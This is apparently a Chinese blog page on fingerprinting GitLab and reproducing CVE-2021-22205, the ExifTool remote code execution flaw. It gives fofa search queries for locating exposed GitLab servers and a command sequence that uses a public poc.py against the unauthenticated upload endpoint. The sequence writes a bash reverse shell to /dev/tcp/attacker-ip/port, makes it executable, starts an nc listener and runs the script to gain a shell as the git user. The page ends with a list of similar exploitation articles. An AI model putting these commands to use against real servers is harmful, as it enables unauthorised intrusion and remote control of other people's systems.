当前位置: 首页 > news >正文

GitLab特征及漏洞复现

GitLab是一款Ruby开发的Git项目管理平台。

Web特征

其默认web页面在:http://host:8080/users/sign_in,端口可变,存在用户验证接口。

image-20251122153129989

该产品存在标签页默认icon图标:image-20251122153049781

fofa语法:title="Sign in · GitLab" protocol="https" status_code="200"title="GitLab"

漏洞复现

CVE-2021-22205(ExifTool导致的RCE)

在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。

影响范围:11.9 <= GitLab(CE/EE)< 13.8.8、13.9 <= GitLab(CE/EE)< 13.9.6、13.10 <= GitLab(CE/EE)< 13.10.3

复现示例

GitLab的/uploads/user接口可以上传图片且无需认证,利用已公开的poc.py脚本进行反弹shell:

# 写入反弹shell脚本
python3 poc.py http://target-ip:8080 "echo 'bash -i >& /dev/tcp/attacker-ip/port 0>&1' > /tmp/1.sh"
# 给执行权限
python3 poc.py http://target-ip:8080 "chmod +x /tmp/1.sh"
# 攻击机监听6666端口
nc -lvnp 6666
# 运行,获取git权限shell
python3 poc.py http://target-ip:8080 "/bin/bash /tmp/1.sh"

成功反弹shell:

image-20251122160322403
http://www.gsyq.cn/news/68504.html

相关文章:

  • JBoss中间件特征及漏洞复现
  • 大华摄像头系统特征及漏洞探测利用
  • 大华DSS系统特征及漏洞探测利用
  • 畅捷通系统特征及漏洞探测利用
  • 瑞友天翼系统特征及漏洞探测利用
  • 2025年河北公职考试培训优质品牌推荐:仕登科全阶段备考服务 高校合作保障,助力考生稳上岸!
  • 金和OA系统特征及漏洞探测利用
  • 随机动量梯度法的末点收敛性分析
  • 通达OA系统特征及漏洞探测利用
  • 蓝凌OA系统特征及漏洞探测利用
  • 2025年优质供应链云平台TOP10,实现全链路数字化!财务云/供应链云/易代账/用友 T3/协同云/制造云/好业财供应链云产品选哪家
  • git项目管理idea
  • Manim v0.19.1 发布啦!三大新特性让动画制作更丝滑
  • React 14 - 教程
  • 主席树板子
  • 气密性检漏仪精品定制TOP5权威推荐:甄选供应企业与大型厂家
  • 2025年工业冷风机降温效果揭秘:如何选择适合的降温设备,五金车间通风降温/铁皮房车间降温/汽车配件车间通风降温工业冷风机供应商推荐排行榜
  • pinia应用
  • 2025年口碑好的家用电吹风开关/电吹风开关厂家最新权威实力榜
  • 2025年廊坊地区服务不错的短视频代运营企业推荐,短视频代运
  • 2025年12月全国太阳能路灯厂家五大推荐:场景导向排行榜与全链路照明解决方案
  • 2025年市面上服务好的花灯制作价格推荐,大型户外花灯/商场美陈花灯/灯会花灯/智能花灯/生肖花灯/花灯灯展/马年花灯批发口碑推荐
  • 2025年耐用的吨袋真空包装机行业内知名厂家排行榜
  • 2025比较有名的留学机构
  • 2025年评价高的馄饨皮切皮机/智能切皮机行业内口碑厂家排行榜
  • 2025年口碑好的面条机厂家最新实力排行
  • 2025年口碑好的穿墙止水螺杆厂家推荐及选择参考
  • 2025年口碑好的挤出机用户口碑最好的厂家榜
  • 2025年培育钻店铺推荐供货厂家权威推荐榜单:淘宝培育钻店铺推荐‌/培育钻推荐‌/培育钻推荐品牌‌源头厂家精选
  • 2025年舞台升降幕批发厂家权威榜单:电影院银幕/影院银幕/舞美演义幕提供商精选